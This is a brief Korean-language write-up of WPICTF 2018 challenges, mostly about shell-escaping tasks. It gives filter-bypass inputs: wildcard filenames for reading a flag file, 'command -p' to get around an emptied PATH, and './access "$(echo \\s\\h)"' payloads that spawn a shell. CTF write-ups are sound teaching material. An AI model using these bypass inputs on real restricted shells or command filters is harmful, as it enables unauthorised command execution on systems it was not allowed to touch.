WPICTF 2018 Write up

웹 문제는 하나도 안걸들이고 처음으로 포너블 문제만 건들였던 CTF이다.

ezpz 문제 exploit code 

forker.level1 문제 exploit code

Shell Escaping 문제

엄청 쉽다. 

첫번째는 그냥 cat fl?g.tx? 이런식으로 풀면되고, 

두번째는 command 명령어를 이용해서 풀면된다. command -p cat fla?.tx? 이런 식으로 하면 될 것이다. 

두 번째 문제가 어려운 이유는 PATH 환경변수를 "" 으로 Setting 하는 것 때문인데, command 명령을 이용하면 쉽게 풀 수 있다. 

첫번째 문제에서는 쉘을 획득할 수도 있는데 해당 페이로드를 돌리면 된다. 

./access "$(echo \\s\\h)"

bash에서 echo \s\h를 하게 되면 sh 만 출력되는 원리를 이용한 것이다. 

./access "command -p $(echo \\s\\h)"